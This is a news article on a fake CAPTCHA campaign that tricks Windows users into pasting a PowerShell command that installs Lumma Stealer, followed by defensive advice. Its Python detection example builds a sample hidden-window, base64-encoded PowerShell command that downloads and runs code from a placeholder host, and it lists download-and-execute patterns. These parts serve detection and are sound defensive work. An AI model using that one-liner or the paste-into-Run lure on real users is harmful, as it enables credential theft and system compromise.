
Fake Human Verification Pages Deliver Lumma Stealer Malware: CloudSEK

Threat actors create phishing sites hosted on various providers, often utilising content delivery networks.

A new method of distributing Lumma Stealer malware targets Windows users through fake Google CAPTCHA pages. (Source: Kerfin7/Freepik)

A new method of distributing Lumma Stealer malware has been uncovered by cybersecurity company CloudSEK; it targets Windows users through deceptive human verification pages. The technique was first identified by Unit42 at Palo Alto Networks, and its discovery has prompted investigation into whether it could be leveraged to deliver other types of malicious software.

How The Attack Works

Threat actors create phishing sites hosted on various providers, often utilising content delivery networks. When a user visits one of these sites, it presents a fake Google CAPTCHA page. Upon clicking the “Verify” button, users are tricked into following these unusual instructions:

  • Open the Run dialogue (Win+R).

  • Press Ctrl+V to paste copied content.

  • Press Enter.

Unknown to the user, clicking the button triggers a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard. Pasting that command into the Run dialogue and pressing Enter executes it; the command downloads the Lumma Stealer malware from a remote server, compromising the victim’s system. The downloaded malware then establishes connections with attacker-controlled domains, putting users and their data at risk.

“This new tactic is particularly dangerous because it plays on users' trust in widely recognised CAPTCHA verifications, which they encounter regularly online. By disguising malicious activity behind what seems like a routine security check, attackers can easily trick users into executing harmful commands on their systems,” said Anshuman Das, security researcher at CloudSEK.


Key Observations

Attackers use base64 encoding and clipboard manipulation to evade detection. According to CloudSEK, fake human verification pages have been hosted on platforms like Amazon S3 and CDNs.
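Base64 encoding hides the command from a glance at the clipboard, but not from a log pipeline that decodes it. As an added example, not code from CloudSEK's report, the Python below decodes the -EncodedCommand argument found in process-creation command lines and flags encoded or hidden-window PowerShell that both fetches and executes remote content; the sample command lines and the example.invalid URL are constructed for illustration.

```python
import base64
import re
from typing import Optional
# PowerShell switches that take a base64 (UTF-16LE) script as their argument.
ENCODED_SWITCH = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Behaviours the fake-CAPTCHA one-liner relies on: fetch from a URL, then run it.
INDICATORS = {
    "download": re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I),
    "execute": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}

def encode_ps(script: str) -> str:
    """Encode a script as PowerShell expects for -EncodedCommand (used to build samples)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script from a -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse(cmdline: str) -> dict:
    """Classify one process command line: decode it, then look for download-and-run indicators."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    hidden = re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I) is not None
    return {
        "encoded": decoded is not None,
        "hidden_window": hidden,
        "decoded": decoded,
        "indicators": hits,
        # Flag encoded or hidden-window PowerShell that both fetches and executes remote content.
        "suspicious": (decoded is not None or hidden) and {"download", "execute"} <= set(hits),
    }

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_CMDLINES = [
    "powershell.exe -w hidden -ep bypass -enc "
    + encode_ps("iex (iwr http://example.invalid/x.txt -UseBasicParsing)"),
    "powershell.exe -Command Get-Date",
    "powershell.exe -enc " + encode_ps("Get-ChildItem C:\\Temp"),
]
```

Feeding the same logic the command lines recorded by Sysmon or Windows event 4688 (with command-line auditing enabled) surfaces pasted one-liners whose parent is explorer.exe, which is exactly what the Win+R step produces.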

The malware may download additional components, complicating detection and analysis. Although this campaign primarily targets distributing Lumma Stealer malware, it has the potential to deceive users into downloading various types of malicious files onto their Windows devices.

Recommendations

CloudSEK issued recommendations to help users and organisations defend against the attack. These include educating employees and users about this new social engineering tactic, particularly the danger of copying and pasting unknown commands.

Organisations should deploy robust endpoint protection solutions capable of detecting and blocking PowerShell-based attacks. They should also monitor network traffic for suspicious connections to newly registered or uncommon domains, and regularly update and patch systems to reduce vulnerabilities exploited by Lumma Stealer.
